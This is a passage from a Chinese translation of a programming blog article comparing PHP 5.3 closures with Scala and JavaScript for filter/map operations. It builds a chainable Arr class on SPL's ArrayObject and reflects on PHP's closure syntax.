val res = nums filter (_ > 15) map (_ * 2 + x)
译注，Javascript 的实现：
var i = 1;
var res = nums.filter(function(c){return c > 15}).map(function(c){return c * 2 + i});
以及 PHP：
$x = 1;
$res = array_map(
function($v) use ($x) { return $v * 2 + $x; },
array_filter(
$nums,
function($v) { return $v > 15; })
);
光从代码量方面，现在看起来 PHP 与其他语言有出入了。先抛开代码字面上本身 的审美不谈，上面的 PHP 代码还有个额外的问题。

例如，如果需要使用数组的键而非值作比较，怎么办？是的，上面的代码就办不到了。同时，从语法角度上说，上面的代码非常难以阅读。

返璞归真，这时还是得返回老土的思路去解决问题：
$x = 1;
$res = array();
foreach ($nums as $n) {
if ($n > 15) {
$res[] = $n * 2 + $x;
}
}
呼，这样看起来又很清楚了。但这个时候你或许又会迷惑了：“那还瞎折腾啥，这不就是个数组操作吗？”。

是的，好戏还在后头。这个时候该让 PHP 的某些高级特性出场，来搞定这看似有自残倾向 的“无聊问题”。
ArrayObject – 对数组的封装
PHP 有个称作 SPL 的标准库，其中包含了个叫做 ArrayObject 的类，它能提供“像数组一 样操作类”的功能，例如
$res = new ArrayObject(array(10, 20, 30, 40));
foreach ($res as $v) {
echo “$vn”;
}
ArrayObject 是个内置的类，所以你可以像其他类类操作一样封装它。
Arr – 包上糖衣
既然我们已经有了 ArrayObject 以及闭包这些特性，我们就可以开始尝试封装它：
class Arr extends ArrayObject
{
static function make($array)
{
return new self($array);
}

function map($func)
{
$res = new self();
foreach ($this as $k => $v) {
$res[$k] = $func($k, $v);
}
return $res;
}

function filter($func)
{
$res = new self();
foreach ($this as $k => $v) {
if ($func($k, $v)) {
$res[$k] = $v;
}
}
return $res;
}
}
好了，万事俱备。下面重写的 PHP 代码就可以解决上面提到的问题，并且看起来语法上“差 不多”了：
$res = Arr::make($nums)
->filter(function($k, $v) { return $v > 15; })
->map(function($k, $v) { return $v * 2; });
上面的代码与传统方式有何不同呢？首先，它们可以递归并形成作用链式的调用，因此可以 添加更多的类似操作。

同时，可以通过回调的两个参数分别操作数组的键以及值其项 – $k 对应键以及 $v 对应值 。这使得我们可以在闭包中使用键值，这在传统的 PHP 函数 array_fliter 中是无法实现的。

另外个带来的额外好处就是更加一致 API 调用。使用传统的 PHP 函数操作，它们有可能第一个参数是个闭包，或者是个数组，抑或是多个数组…总之谁知道呢？

这里是 Arr 类的完整源代码，还包含了其他有用的函数（类似 reduce 以及 walk），其实它 们的实现其实方式和代码类似。
博弈
这个问题其实很难回答 – 这需要根据代码的上下文以及程序员自身等众多因素决定。其实 ，当我第一眼看见 PHP 的闭包实现时，我感觉似乎回到了那很久以前的 Java 时期，当时 我在开始使用匿名内置类（anonymous inner classes）来实现闭包。当然，这虽然可以做到， 但看起来实在是些画蛇添足。PHP 闭包本身是没错，只是它的实现以及语法让我感到非常的困惑。

其他具有闭包特性的语言，它们可以非常方便的调用闭包并同时具有优雅的语法。在上面的例子 中，在 Scala 中使用传统的循环也可以工作，但你会这样写吗？而从另个方面，那么有人 说上面这个题目使用 PHP 的闭包也可以实现，但一般情况下你会这样写吗？

可以确定，PHP 闭包在些情况下可以成为锐利的军刀（例如延时执行以及资源调用方面）， 但在传统的迭代以及数组操作面前就显得有些为难。不要气馁不管怎么样， 返璞归真编写具有兼容性的、清爽的代码以及 API 是最重要的。
结束语
像所有后来加上的语法特性一样（记得当年 Java 的 Generics 特性不？以及前几年的 PHP OOP 特性），它们都需要时间磨合以及最终稳定下来。随着 PHP5.3 甚至将来的 PHP6 逐渐普及，越来越多的技巧和特性相信在不远的将来逐渐的被聪明的程序员挖掘出来。

回到最初文章开头那个题目，对比
$res = Arr::make($nums)
->filter(function($k, $v) { return $v > 15; })
->map(function($k, $v) { return $v * 2; });
以及
val res = nums filter (_ > 15) map (_ * 2)
两者之间的区别。归根结底它们仅是语法而已，本质上都是殊途同归解决了同个问题。程序 语言的应用特性不同，自然孰优孰劣也就无从比较。

最后，相信可以找到更多如何使用 PHP 进行函数式迭代（当然不仅仅是这些）的心得。